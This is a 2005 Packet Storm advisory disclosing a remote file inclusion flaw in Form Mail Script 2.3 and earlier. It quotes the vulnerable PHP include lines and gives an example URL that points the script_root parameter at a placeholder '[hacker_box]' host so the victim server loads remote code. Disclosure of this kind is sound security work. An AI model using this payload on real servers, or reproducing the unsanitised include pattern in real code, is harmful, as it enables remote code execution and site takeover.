formmail23.txt

2005-03-07T00:00:00
ID PACKETSTORM:36473
Type packetstorm
Reporter Filip Groszynski
Modified 2005-03-07T00:00:00

Description

                                        
                                            `  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: Form Mail Script (FS)  
Version: <= 2.3 (free/commercial)  
Homepage: http://www.stadtaus.com/  
  
Author: Filip Groszynski (VXSfx)  
Date: 4 March 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Vulnerable code in inc/formmail.inc.php:  
  
...  
/*****************************************************  
** Include functions  
*****************************************************/  
include $script_root . 'inc/functions.inc.php';  
include $script_root . 'inc/template.class.inc.php';  
include $script_root . 'inc/template.ext.class.inc.php';  
include $script_root . 'inc/formmail.class.inc.php';  
...  
include $script_root . 'languages/language.' . $language . '.inc.php';  
...  
  
--------------------------------------------------------  
  
Example:  
  
if register_globals=on and allow_url_fopen=on:  
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/  
  
--------------------------------------------------------  
  
Fix and Vendor status:  
  
Vendor has been notified.  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski <VXSfx>  
Location: Poland <Warsaw>  
Email: groszynskif <at> gmail <dot> com  
HP: http://shell.homeunix.org  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`